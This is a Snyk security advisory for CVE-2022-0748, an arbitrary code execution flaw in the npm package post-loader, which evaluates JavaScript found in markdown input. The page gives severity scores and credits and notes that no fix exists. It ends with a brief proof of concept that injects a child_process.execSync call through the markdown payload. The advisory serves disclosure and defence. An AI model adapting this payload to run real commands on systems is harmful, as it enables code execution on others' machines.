Homepage
About Snyk

Arbitrary Code Execution Affecting post-loader package, versions >=0.0.0

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    EPSS 0.52% (77th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-POSTLOADER-2403737
  • published 2 Mar 2022
  • disclosed 16 Feb 2022
  • credit Feng Xiao and Zhongfu Su
Report a new vulnerability Found a mistake?

Introduced: 16 Feb 2022

CVE-2022-0748 Open this link in a new tab
CWE-94 Open this link in a new tab
First added by Snyk

How to fix?

There is no fixed version for post-loader.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.

PoC 

const postLoader = require('post-loader')
var payload = '---js\n((require("child_process")).execSync("touch rce"))';
new postLoader(payload);